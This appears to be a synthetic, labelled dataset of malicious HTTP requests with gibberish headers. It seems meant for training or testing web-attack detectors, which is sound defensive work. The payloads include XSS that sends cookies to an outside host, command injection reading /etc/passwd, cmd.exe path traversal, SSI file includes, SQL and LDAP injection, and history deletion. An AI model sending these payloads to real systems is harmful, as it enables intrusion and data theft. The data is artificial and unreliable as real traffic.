Accept-Encoding: gzip;q=0.1
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Cookie: r8s=6017;peqnp9b=<body    onload=    "    [alert   ('otte4Olnt');] " >;jfromhUSnchildl=9a;rpasswdyathe;paet=459383
Date: Wed, 27 May 09 15:15:17 CET
ETag: "vKPRrbQWtDJl7Ywr"
From: id5rnsE@noEEndoae.be
If-Range: *
Max-Forwards: 833
MIME-Version: 5.6
Pragma: ollm6='houf5ire'
Proxy-Authorization: NTLM c2xhaGxnYmhveGlsbnh0bThsZXJtZXNlUm51Y2R0Y3RydG4=
Referer: /e7l1asic/E8ii/cqbdnTsG.tar
User-Agent: aa2daeep (aCmDTPIm; 9mQUXMhurs; nMbFuuS; pTF0YJ3)
UA-CPU: 68000
UA-Disp: 344,654,32
UA-Color: color16
Via: 1.4 www.pSnr.png
Transfer-Encoding: gzip
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wt5see=e3ubetween-psperl-hstyleuqeiit( &nohotznsglnha=s-XGN4&nrjtCva4ooidt=21&daheoe=9335166843&3nba5=poaxterme=n$=deletere2

End - Id: 48244
Start - Id: 40723
class: SSI
GET /a@SCn/upteUz/l4r/rPbaAWXpaegjTwIQ/wrwtpmg9C-z1Pc9Ye1/SnyAbf/cdOorsnlalhnt4tar9/eFXzxyDTGLb/bnnfr.cgi?osadeste=26079&yEegeopeo4S=57&ryscl0rul=5&an=%3Ee&sMme5eiawimutd=%2Bon%2Frcezadxuzabgsound&t9t6UeTsgmcepd=0031&evn5esfi6lHub=a+s+&TssQhraIpexg=%7E8mc%5Bemdelete&hotcosnlNj5esS=4737100023&sFHTBg3=lChooInhge&wbohrsvsiie=nsistonvl&ooeihecboi=9&Z9meaEt=9631 HTTP/1.1
Host: www.hGrxoeRorY.de
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 87.193.44.132
Cookie: h0=9;@.NFhEN2=5;g.3YZGClike=rmej(httpbn;nunswtz=attruneemu
Date: Wed, 05 Jan 05 01:08:40 GMT
Expect: oesE=cendi
If-Unmodified-Since: Fri, 17 Feb 06 24:40:32 UTC
Pragma: roomagi=z
Proxy-Authorization: Basic U3VhY2lzb0U6aXdzbg==
Authorization: NTLM b2V5bm9vb3JlZWt3dUV1YWhobmhucmVlc21JZzNxZXJwc3loTFhuZWxmZzQ=
Referer: http://www.uREteets.cz/nssetb/qlrnt/nnm5a/Esshnln/5hwn.swf
User-Agent: <!--    #odbc connect="tIts,ml,tFfpy"    statement="select *  from   t"-->
UA-Pixels: 665x5598
Via: HTTP/2.6 114.248.35.202, 1.4 www.9aevF.css:9025
Transfer-Encoding: AcfgnC; arae=eols
Upgrade: tnhbcr/4.1, jltoS/5.7, hnntni/0.8, kjr8nt/5.2
Warning: 221 www.omgchy.tiff:9473 "Tehnswniqhta54n" 

null

End - Id: 40723
Start - Id: 36760
class: OsCommanding
GET /t9hLqfURToKsq/Hdcpeoov/jc/3namioayvieavp/top/frOhAe2vnr.cgi?SCXS9u3R=eEte4ns8sabepOeot3&elcrh31tedTru=fyiho&m5ar81penue=3606515&oatg=m&adts6luaznh=-o4soshneoia%5Dbbl&hotte54aznA=Ress&ntxcDygtdce=%250a++++cat+++++%250a+++%2Fetc%2Fpasswd%250a&cycmdu=0049280 HTTP/1.1
Host: 106.199.10.152:14
Connection: hoezx
Accept: video/mpeg, video/*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: e6un-aste, nul-Ts5qwdia;q=0.7, tt-zmhgOCM;q=0.7
Cache-Control: min-fresh=9050
Client-ip: 130.81.190.203
Cookie: QPCSXmb25=t=aW;dtmoe=37CqSshutdownoyxo4m;qn=113926033
Cookie2: $Version="576"
Date: Mon, 13 Feb 06 12:04:51 GMT
ETag: W/"nq-5AohjOXHMiQfI"
Expect: 100-continue
From: 1Ruwies@Rllsdtnt.st
If-Modified-Since: Tue, 04 Nov 08 19:30:21 CET
If-Unmodified-Since: Sat, 28 Mar 09 10:17:41 CET
If-Match: "AcodqUqxsT1b9Y33"
If-None-Match: "HfjEhsKvvX7hEI24"
If-Range: "ljlX7WAzTSP.gtyEI"
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest response="49a2dbb09A077a8FDd2baA76dAA5E5dd"
Authorization: Digest opaque="azs2"
Range: 8-,6-50
Referer: http://deDajOv.org/co8tnth/eoetor/ohiNi/leceher/mwbqo.cfm
TE: deflate,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: EEmnmrsrEEpeoN1dti5h
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 232x1783
Via: 6.1 215.249.75.54
Transfer-Encoding: deflate
Upgrade: ozdet9/9.7, Rir/6.3, t2nuis/3.2, OrehaH/2.4
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36760
Start - Id: 43951
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 141.31.251.121
Connection: sh6l
Accept: text/xml, audio/*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: y7twee-urd7;q=0.4, Nrfxsbi-erOriti9
Cache-Control: max-age=44655
Client-ip: 167.244.39.243
Cookie: azabauurmo=eltii|;Totkiyoast1nd=8112802;dNm9oooa8n=fHJPeGIX;suourdauNroiT=rmXee>nup
Cookie2: $Version="790"
Date: Fri, 05 Jan 07 06:30:38 UTC
ETag: "Nd4SKGTA_nnaZTH0"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Sun, 30 May 04 15:32:31 GMT
If-Unmodified-Since: Tue, 26 Sep 06 03:10:26 UTC
If-Match: "f.kU74QVrYoqJoL"
If-None-Match: *
If-Range: Wed, 16 May 07 04:00:05 CET
Max-Forwards: 8
MIME-Version: 7.7
Pragma: tdghaoVa='Rgnih'
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: NTLM clNSemR0YmZzdGNlV3NEc3RyZmFlWHRlb25MUndwZmFvbm50Tg==
Range: 82123-4178,474-0290,0-
Referer: /o5ndemao/Sdedtm/i9Svh.php4
TE: trailers
Trailer: Via
User-Agent: Mozilla/3.0 (X11; U; Linux i586 3.4; ja-th; rv:9.2.9) Gecko/81169665
UA-CPU: 68000
UA-Disp: 068,6822,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 539x520
Via: FTP/7.0 www.lridgit.js, FTP/0.5 www.deerrin.html, 4.3 86.191.119.87
Transfer-Encoding: caaa
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43951
Start - Id: 47206
class: XSS
GET /r98bzS@MzfbfYgR.php3?ab43oungDm=93m&P5B09CB@P0k=8188154&ete=6&Erersno5b5MC2e=i3emcimochax%22whereh%5C%22aersaE+&ytswfeecdke=50&9dachFhejrue=71189463&ctdec6pexetfz=%3Cimg+src%3D%26%7B%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.reisma.com%2Fcgi-bin%2Fvendanrans.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B%3E&trn35LirenriIi=nTsfquhfa7naneu HTTP/1.1
Host: 70.148.119.71
Connection: 9xltr
Accept: application/*;q=0.8
Accept-Charset: windows-1250
Accept-Encoding: *
Accept-Language: a2turo-eb, wnrvub-nlgw8Cs;q=0.6, sa-mdecxO
Cache-Control: min-fresh=9
Client-ip: 63.161.16.102
Cookie: hotkiEund3ss=8952;src4uheo=xn/passwd;mieEm=0I;e7Esiojretde=]ss;@tMin3AJ=rs'lsW5i~e=wp-[n-
Cookie2: $Version="8"
Date: Mon, 07 Sep 09 24:44:42 UTC
ETag: "owjdohDQxUXpeBzPAh5"
Expect: 100-continue
From: cocoop6n@AdGe4uodie.be
If-Modified-Since: Tue, 05 Sep 06 06:44:28 GMT
If-Unmodified-Since: Sat, 26 Jan 08 08:25:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Sep 06 04:30:02 GMT
Max-Forwards: 4253
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: NTLM c242dHJOdDVzYThpUmVtZ253THJzd2Rpb25oeWdoTm5ybQ==
Range: 8-,46-,-554862
Referer: http://lseewd.fr/roAgsnm.asp
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/5.4 (Machintosh; U; Mac OS X 6.5; 7e-oa; rv:2.9.9) Gecko/26707793
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 286x017
Via: HTTP/3.5 www.sfdrfbsa.tiff, FTP/4.1 www.Rpf4onp.js, 5.3 www.eEjed8e.html
Transfer-Encoding: 5ore; EErEntt=tRtocaD
Upgrade: urd/1.0
Warning: 923 www.oagu.tiff "eebol" 
X-Forwarded-For: 42.248.51.9
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47206
Start - Id: 39562
class: SSI
PUT /pK@B/7S1rFt@O/thtsnt/taobhttt/emZW-VT-h0camJi.php4? HTTP/1.0
Content-Length: 348
Content-Language: n2,o
Content-Encoding: compress
Content-Location: /ato7yr/anmd/spegpmia/gsstsoel/rah6rn.php3
Content-MD5: c2V5ZWVpb2VtZXVsU3RkWQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Sep 08 14:58:43 UTC
Last-Modified: Thu, 12 Aug 04 07:19:43 GMT
Host: www.d8bsrseee.ch
Connection: close
Accept: */*
Accept-Charset: euc-kr, isiri-3342
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 147.32.196.230
Cookie: oaevqjSygnec=9eeie;yfhaR9bpd=62516;rn=ie9nss5Mpersms;6A0earIiogiraad=Elo0e9Hcots
Cookie2: $Version="879"
Date: Fri, 30 Nov 07 06:25:17 CET
ETag: ".ZpMfbiUz3x2gzQ"
Expect: 100-continue
From: zdt1Ooe@cVtsgan.ch
If-Modified-Since: Mon, 24 Oct 05 18:28:49 CET
If-Unmodified-Since: Sun, 06 Sep 09 14:46:39 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Jan 08 09:59:13 GMT
Max-Forwards: 3243
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZjJzNWlueDhhY29hdHBvZ2VvZWZwcmlyb2ljdDdidm55YXR5eTJpRWV4YWpTZXA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 80266-6,060-21789
Referer: http://www.8eddel.org/Yheade/tsxp.mdb
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Referer
User-Agent: Mozilla/1.7 (compatible; Konqueror/0.6; Win 9x; uMethtxTbe; aidczioUs3; goct)
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color8
Via: ttbAa/3.4 www.feb5.gif:15029
Transfer-Encoding: identity
Upgrade: nqe/4.6, tcf/9.3, s1a3ie/5.1, pcoE/9.0, Ier1/7.4
Warning: 705 73.205.19.33:824 "uGhloLhinanOnahntN" 
X-Serial-Number: 11507528452920010282
----: -----------------
~~~~~: ~~~~~~~~~~

ItQaToautoexecBDc=90&Urprcm=asj.&usfjrmwCcpd=<!--     #include     virtual="/etc/httpd/httpd.conf"   -->&rep1sou7ecc=0377236346&ak7nAqiMSW=3573205324&zh6tsrlp=84&lzedeo='ft(updateii&oZwOnaot1Innaln=8hjel&nhtesy=iebodysR\rsdtelnete1s m&CSyncmUrFqqS=19Avxitu&tdtS5ut=788025&9ttiEEee3yc=2485765&tcdPotedsos8O=PthE uy'~Au9

End - Id: 39562
Start - Id: 44332
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: www.enbne.biz
Connection: 6cmrsie
Accept: audio/*, image/jpeg, video/*
Accept-Charset: iso-2022-kr
Accept-Encoding: identity;q=0.3, gzip, gzip, deflate, identity
Accept-Language: civ-tu;q=0.2, t-iOSbser6;q=0.3
Cache-Control: sh1tjps=um
Client-ip: 70.255.193.81
Cookie: Hoslenvn= w@ n
Cookie2: $Version="92"
Date: Thu, 18 Dec 08 09:24:26 CET
ETag: "JwOlqko42x3NtlOT"
Expect: tnstr3=Ht7tPac;rhjSmod
From: ssaaei@srTei5is.de
If-Modified-Since: Fri, 28 May 04 09:10:38 GMT
If-Unmodified-Since: Sat, 12 Apr 08 15:01:37 GMT
If-Match: *
If-None-Match: *
If-Range: "KifzXthQy8DwbK-h6d"
Max-Forwards: 1
MIME-Version: 1.6
Pragma: htx5P='d'
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: Digest qop=o9hhYhvt
Range: 88-15414
Referer: http://www.3ltnrxe.cz/jrlAd/r14totda/VinlB/saw6neu/e5cd.php
TE: deflate;q=0.5
Trailer: If-None-Match
User-Agent: 4D@@i8F9 http://www.gccSHtn.gov
UA-CPU: PowerPC
UA-Disp: 8897,9221,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: ao4d8z/0.3 www.Fpodoa6.htm, 0.7 102.52.140.200, byeheb/8.3 39.125.50.193:9139
Transfer-Encoding: gzip
Upgrade: srlma/8.2, So6/5.2, moPz/7.3, aeng/1.5, aoyO0a/8.2
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44332
Start - Id: 44072
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.1
Host: 252.232.0.91
Connection: aired
Accept: video/mpeg, audio/basic
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: etos-ttt
Cache-Control: max-age=73115
Client-ip: 103.148.81.42
Cookie: CCxPH=ecSzua
Cookie2: $Version="1"
Date: Sat, 24 Apr 10 13:14:35 CET
ETag: W/".Z.c4.xeA3kSTWv"
Expect: 100-continue
From: eyde@enOee.biz
If-Modified-Since: Thu, 01 Dec 05 02:58:49 UTC
If-Unmodified-Since: Sat, 23 Jun 07 03:48:37 UTC
If-Match: *
If-None-Match: *
If-Range: "C1H9fyXqPdeZ7PAV4MsR"
Max-Forwards: 16
MIME-Version: 9.0
Pragma: g=e
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: bIaa veahoau=hRen
Range: -6,-7
Referer: /hyoy.wmn
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/2.7 (compatible; Konqueror/0.9; Solaris; olt7; rtai7moer; n0et)
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: 7.1 94.224.137.87, 1.3 www.ihyde.shtml, 9.4 47.50.23.59:6
Transfer-Encoding: deflate
Upgrade: unHis2/9.7, sDw/8.7
Warning: 247 www.hxe31.png "9a02iegsdsel8esiecoC" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44072
Start - Id: 47382
class: XSS
GET /h9ocn2m/-aV84KP-/n1AM1SBYnT5sSe-K7z/0zeg4qqe3p3/rTU2Cpc4tthZLi5tEbQX/Kq/zdta.shtml?abi=%3Cimg+dynsrc++++%3D++%22++++javascript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.ne.com%2Fcgi-bin%2Ftaenit.cgi%27%2Bdocument.cookie%29%3B%5D+%22+%3E&o0tknlnhmrPwa=a16eD.OXSiR HTTP/1.1
Host: 79.111.87.129
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, compress
Accept-Language: *;q=0.1
Cache-Control: min-fresh=80
Client-ip: 77.243.41.187
Cookie: tr2eixtciyd=626116851;z74fnatusaAucA8=hsssystemstdinst7n4i9wp-isPdocument&nwindow.open;yn=t ?;zatehntri=7jtou8oaeUofa5
Cookie2: $Version="55"
Date: Sat, 05 Jul 08 07:28:46 GMT
ETag: W/"eK9JG65XxM2Bk-Ko"
Expect: 7xxmj=O1mtSo
From: dhMEe9le@RpqtlrdwLb.be
If-Modified-Since: Sat, 22 May 04 13:12:25 UTC
If-Unmodified-Since: Fri, 23 Jan 09 06:33:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 2.6
Pragma: r='aodat'
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Basic aXBucmM6ZXNhY3U=
Range: 35419-,75138-2674,165640-
Referer: http://www.l9nuiq.com/enkaepev/4etww5a/latl/nekai.asp
TE: trailers,deflate;q=0.9
Trailer: Accept-Charset
User-Agent: Mozilla/4.3 (compatible; ue3g; Windows NT; cthebmo; rtbIp)
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 9.4 134.100.224.172:21, 3.5 www.58oM.css, 8.6 www.emwieaLS.shtml
Transfer-Encoding: deflate
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 630 69.99.208.229 "aypepysetwq" "Mon, 12 Apr 04 06:01:50 CET"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 71254341199
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47382
Start - Id: 42310
class: SqlInjection
GET /8sdkQJjKDAZ_QX/alcNU68QgsxL/8sytnier6ersoTiO/wair1rfme/eN-tM-B67x7W1/53ob/o1SnP8fmlGKfvZeQL6/5EgQdQKFLwGQ9GNjA@/tU/osgtlaohetiorhag.js?thnYrsmqew8=08379&0u60LL7D=il5te&MIwtwes4rtotc=EAnsr&LqperlULxqrdq-=7prdt7co&mgS=48&en=dNERvE35qI9B&en8uasue=T&68vppt=7579&nEs=dhttpletblc++ui&aeaSt3ldbtwxt=611932&nsegtfqzr=liketd%25vaJtmpom7t&inolnt2d=%3B+++EXEC%28++%27INS%27%2B%27ERT+++INTO++++users+values%280%2C%27qp1heielw%27%2C%27ieoonofego%27++++%29%29&d6cFetc=530263 HTTP/1.1
Host: 60.46.159.241
Connection: close
Accept: */*;q=0.3
Accept-Charset: big5;q=0.7, x-mac-korean, windows-1252;q=0.9
Accept-Encoding: *
Accept-Language: U-Avijxta;q=0.4, 2wlq-0oI3s;q=0.0, f-n;q=0.3, nbta7q-w6hdwnse;q=0.8
Cache-Control: no-cache
Client-ip: 50.218.71.30
Cookie: pavf8ltz=01015221;le7haeg5hr=3;lo8=f 
Cookie2: $Version="134"
Date: Tue, 03 Aug 04 04:12:07 GMT
ETag: "3b.fk.WCMYAXJiT2"
Expect: nrnensan=fsp0xwe;aaK9o=srtca
From: h5dt@dgwd.cz
If-Modified-Since: Sun, 06 Apr 08 21:59:27 GMT
If-Unmodified-Since: Mon, 18 Feb 08 24:57:16 CET
If-Match: "z7iJ5rV@Ct983Df"
If-None-Match: "lUwiy4XMBqqwuBzE-9O"
If-Range: Fri, 11 Feb 05 22:14:46 GMT
Max-Forwards: 7222
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic dHZhSWJjaTpucmVVdzk=
Range: -568889,-588214
Referer: /2oee.jsp
TE: deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/4.1 (Windows; U; WinNT 9.6; ft-tp; rv:5.9.7) Gecko/26379771
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4371x6437
Via: 4etce/4.8 www.edao3see.png
Transfer-Encoding: identity
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 059 www.tMzr5N1s.jpg "haexetlge" "Wed, 23 Jul 08 08:40:57 CET"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42310
Start - Id: 38870
class: LdapInjection
GET /fr7/ilodsh8/nw.mdb?1caU=g2uroMedtel&tlho5edin1rdna=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&uize=rk-r&Uu=tvNFt HTTP/1.1
Host: www.deydmN.org
Connection: bbj2a
Accept: application/*;q=0.2, text/html, audio/basic;q=0.5
Accept-Charset: cp-936;q=0.3, cp-936;q=0.5, iso-8859-15;q=0.7, utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 214.111.130.134
Cookie: passthruViX=621854;Rspar=irCghp;9iHzoahhsotg=41;r23retiwp7pme=dXFloKY_uQwA;ipositionHwt7OU2=j5n3ete5oesheca
Cookie2: $Version="70"
Date: Mon, 09 Aug 04 16:54:34 UTC
ETag: "OCfbQBx-AQOh@IfI"
Expect: 100-continue
From: tdusret@b5koNnc.biz
If-Modified-Since: Fri, 06 Feb 09 23:41:50 CET
If-Unmodified-Since: Wed, 21 Nov 07 16:46:54 GMT
If-Match: "xqLOa_3CaID1fgGt1V"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic ZXlkNnJpYTpxRm9tZ3c=
Authorization: Basic YXR1RDpmOXJsZW4=
Range: 15934-,799-8058,-81465
Referer: http://iBhn.it/gtlNr/oetnwv/vsiEle/lec5.php4
TE: trailers
Trailer: Via
User-Agent: aQxktDrE http://www.acaereaz.ch
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 279x383
Via: 7.3 192.84.30.197, HTTP/6.9 45.45.104.166
Transfer-Encoding: gzip
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 208 www.eiujur.shtml "niihn9Buntieeetne0nn" "Tue, 17 Oct 06 02:46:38 CET"
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 706863
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38870
Start - Id: 36840
class: OsCommanding
POST /VFpnode@TftpDd.KQ94/YCJ0aalPHxVdiv/aonleesh8r/la.x1@p2x-SI0/Pa/xESc/rtSBL@qe9tmh/uq48SPX_errNl/vva.htm? HTTP/1.1
Content-Length: 129
Content-Language: tpte,esdtrizN,l5w
Content-Encoding: identity
Content-Location: http://wdfd.it/snne/ydarttt/eNs8ytc/ndieedrs.swf
Content-MD5: ZXZzZmxGY3Q0cmN0YWFvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 May 08 07:55:37 CET
Host: www.ifee3qrl.biz
Connection: close
Accept: video/mpeg, audio/basic;q=0.3, audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.9, identity, gzip;q=0.6, identity
Accept-Language: '    ;     rm ~/.bash_history;
Cache-Control: only-if-cached
Cookie: ik854gEGabrvcp=4vekltN@e7a ;rwejc0aocfoyn=85143695;ohimsqazti=tqe rCctb;m1rpyU8p= connect;Z0tGkw4=n;pr;etsree1ooeoit=rqrCneoaw5Oiin
Date: Tue, 09 Sep 08 22:51:30 GMT
ETag: W/"M-7mrO2@3AcYJckwqMZR"
From: krrmS3ej@srWg20bdv.org
If-Unmodified-Since: Sat, 10 Jul 04 22:33:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
Pragma: no-cache
Authorization: Basic cmlvcmhhczpoc3JB
Range: 29-
Referer: http://www.3epyo.biz/ehae/uxaknh/sroi66.asp
TE: trailers,trailers
User-Agent: suy0/9.9.3.6.9
UA-Color: color8
Via: 8.1 www.d3namiot.css
Transfer-Encoding: deflate
Upgrade: fxi3i/4.7, m5edrr/2.7
X-Forwarded-For: 136.19.204.176
----: -----------------------

ne=e6BCW@tMjX&ttrkelsdorave3=GwEee&epna1kar=399756&at1akeNtaxd=achilde &5neoleeaoe=6c@&raidswp=ekzk4o0KD&MkXwmYPTv8V=16956477

End - Id: 36840
Start - Id: 39133
class: SSI
GET /L2ta7yexec5Iicb/3aK@6FRXm/o@rJSRXFHicfUz-bwR/d_PbxZ3mfym.exe?Eedhuag=n6FO6CdbvEQ2&ryxoSne2lc0s=aiaddhifhguifkeedt&aebiao=fnb7o&SRiaen=ooI&ynanvganewoehj=7&rtmzt=a2lfLZWqG&iEen=aes%3Dh+oma2gi&httpJsQbecUnc=491&RSoye2iasHri6om=9258&oEtyhaooasdrs=5&remhvge=73202&t7anyUGBGK=10924&h0dCrtWneC=insert HTTP/1.1
Host: 108.13.13.101
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: <!--#echo var="date_gmt"-->
Cache-Control: min-fresh=984
Client-ip: 185.64.68.127
Cookie: aHn4e=4lcOiaoI;nh3issg=attd0eu1l=iwinnt;fVsmEesethhmhr=hl9obroOor;eYnsamdeAxULTq=efg50iqlL;yaiatclwho=9
Cookie2: $Version="443"
Date: Tue, 11 Oct 05 16:55:23 CET
ETag: "WILM38mkEG2SO7@POY"
Expect: hhrmhd=rphdd;asdd=medas
If-Modified-Since: Thu, 03 Jan 08 19:55:25 CET
If-Unmodified-Since: Sun, 18 Nov 07 18:05:10 UTC
If-Match: *
If-None-Match: *
If-Range: "qatT0qY75NlDv7c1"
Max-Forwards: 4535
MIME-Version: 8.3
Pragma: vyst5ihe=8yse
Proxy-Authorization: Digest nonce
Authorization: Basic d25Jcm46ZWlkY3ZM
Range: -55067
Referer: /1n0aneO/uOuer/yehtO7i.php3
TE: trailers,gzip
User-Agent: tnoe (eMIsWsd0; i_Hq4z)
UA-Disp: 036,845,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 062x6317
Via: 8.5 120.88.245.175, 7.6 www.l5wie8.htm
Transfer-Encoding: gzip
Upgrade: ovle/8.4, aroHm/4.2
Warning: 897 250.38.91.23:5 "auyT" "Wed, 26 Oct 05 13:46:39 UTC"
X-Forwarded-For: 136.245.189.109
X-Serial-Number: 55795183768
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39133
Start - Id: 43563
class: OsCommanding
GET /dDuQf/AM/vxilwyt/itDomidoqOmxpil/egd/wG9R6tErDPb1/vJ5dj/gMxrUySAhb@1Z/oilpactslaw/vahethselqwse0/87t3Xvbscriptdocument.E_-Wnph-/mtt4eteribe8agtsne9.asmx?et7e9edolsh=oYe&nT@813formH=nOuC5f7J2&Oxnd-T=iubtarWedbvhYe&enewek=f&daGe=Os2t%27%27&tr=thomena%3Bdhnemsform+%5D&sopwhtn=ecs1CAkiJ.Fy&7is5grr0rv3=%22++%3Btelnet+34.91.249.142+80++%3B&troxradf8gotTlt=tdeatsSeioe&LXr5N8Si-M=504jA5HzB&unieneaq=ytI HTTP/1.0
Host: www.tmnRs.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257;q=0.9, windows-1252, windows-874;q=0.8, x-mac-arabic, iso-8859-4
Accept-Encoding: *
Accept-Language: efzoit-uieae75q, h764st4o-a2daSe, 8uiarbo-f
Cache-Control: max-age=2644
Client-ip: 32.52.143.48
Cookie: dsdlaaLoee=R&n;tiqhfhnHuaaw=3338507827;xuaefe=asBeaVhncdeuic1us
Cookie2: $Version="2"
Date: Fri, 15 Jun 07 10:16:31 CET
ETag: W/"5iLoNVknU2PXMAfL"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Thu, 02 Feb 06 24:52:44 CET
If-Unmodified-Since: Sat, 10 May 08 24:55:54 CET
If-Match: *
If-None-Match: "ZeRQ@_h8P4a_uONtlt"
If-Range: Mon, 16 Jan 06 20:57:39 CET
Max-Forwards: 5
MIME-Version: 7.0
Pragma: in=eeY3titb
Proxy-Authorization: szoGA tiskrnt=veetaa
Authorization: dprin7 woie=reEn
Range: -262090,-9
Referer: http://www.rud9l.de/Tdoqs/dhszn.php3
TE: deflate,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.7 (Windows; U; WinNT 3.8; ex-an; rv:0.1.9) Gecko/64110796
UA-CPU: x86
UA-Disp: 1895,188,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: 2.7 www.tnlm0aaf.gif, 6.8 88.140.138.127, HTTP/2.3 www.ea1sftde.jpeg
Transfer-Encoding: identity
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 897186
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43563
Start - Id: 35529
class: XPathInjection
